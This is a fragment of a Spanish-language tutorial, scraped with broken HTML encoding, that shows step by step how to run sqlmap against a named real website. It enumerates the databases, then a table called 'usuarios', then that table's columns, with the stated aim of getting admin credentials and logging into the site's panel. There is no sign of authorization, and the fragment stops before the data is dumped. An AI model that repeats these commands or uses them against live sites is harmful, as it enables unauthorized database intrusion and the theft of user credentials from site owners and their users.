A penas abrimos sqlmap, podremos ver todos los par\u00e1metros disponibles, ahora solo usaremos los elementales.<\/p>\n
![\"\"](\"..\/fotos\/2.png\")
<\/div>\nVoy a usar una web vulnerable\u00a0smartenergyhome.eu<\/strong> Extracci\u00f3n de informaci\u00f3n<\/strong><\/p>\n Comenzaremos sacando los nombres de las bases de datos, para ello tipeamos:<\/p>\n python sqlmap.py -u target.com\/index.php?id=9 –dbs<\/strong><\/p>\n El programa comenzara a buscar las bases de datos y las mostrara una vez que finalice de correr<\/p>\n En mi caso me trajo 2, de las cuales una es por el cpanel y la otra es de la web. python sqlmap.py -u target.com\/index.php?id=9 \u2013D smartene_SEH — tables<\/strong><\/p>\n Este comando nos arrojara todas las tablas que tiene el sistema, y obviamente debemos buscar alguna que contenga datos de administradores para podernos loguear<\/p>\n En mi caso, la \u00faltima tabla tiene el nombre \u201cusuarios\u201d por lo tanto, esa debe ser la tabla que tiene los datos de los admines. python sqlmap.py -u target.com\/index.php?id=9 \u2013D smartene_SEH \u2013T usuarios — columns<\/strong><\/p>\n Esto nos devolver\u00e1 los nombres de las columnas que tiene dicha tabla.<\/p>\n
\nLas querys las haremos desde aqu\u00ed:\u00a0smartenergyhome.eu\/eng\/seh-buildings.php?id=9\u00a0<\/strong><\/p>\n![\"\"](\"..\/fotos\/3.png\")
<\/div>\n![\"\"](\"..\/fotos\/4.png\")
<\/div>\n
\nLa que usaremos ser\u00e1 la segunda \u201csmartene_SEH<\/strong>\u201d
\nAhora que tenemos el nombre de la base de datos, sigue buscar las tablas que posee, para ello vamos a tipear:<\/p>\n![\"\"](\"..\/fotos\/5.png\")
<\/div>\n![\"\"](\"..\/fotos\/6.png\")
<\/div>\n
\nAhora veremos las columnas que tiene esa tabla de usuarios, para ver si en verdad tiene alg\u00fan usuario y contrase\u00f1a para luego entrar al panel de admin\u2026
\nAhora que conocemos el nombre de la tabla, vamos a tipear ahora lo siguiente:<\/p>\n![\"\"](\"..\/fotos\/7.png\")
<\/div>\n![\"\"](\"..\/fotos\/8.png\")
<\/div>\n
\nPara poder ver que datos contiene esta tabla, vamos a tipear:<\/div>\n![\"\"](\"..\/fotos\/10.png\")
<\/div>\n